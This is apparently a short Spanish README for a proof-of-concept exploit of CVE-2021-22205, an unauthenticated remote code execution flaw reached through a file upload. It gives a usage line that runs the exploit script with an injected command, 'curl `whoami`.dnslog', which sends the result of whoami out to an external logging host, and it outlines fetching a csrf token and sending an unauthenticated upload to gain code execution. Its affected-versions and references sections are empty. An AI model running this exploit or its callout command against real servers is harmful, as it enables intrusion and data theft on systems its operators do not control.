
CVE-2021-22205 RCE no autorizado
Versiones afectadas:
Uso
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

Obtener csrf-token:

Obtenga el csrf-token a través de /users/sign_in y luego use el PoC CVE-2021-22205 anterior para construir un paquete de subida y ejecutar una solicitud de subida no autenticada, logrando finalmente RCE.


Referencias: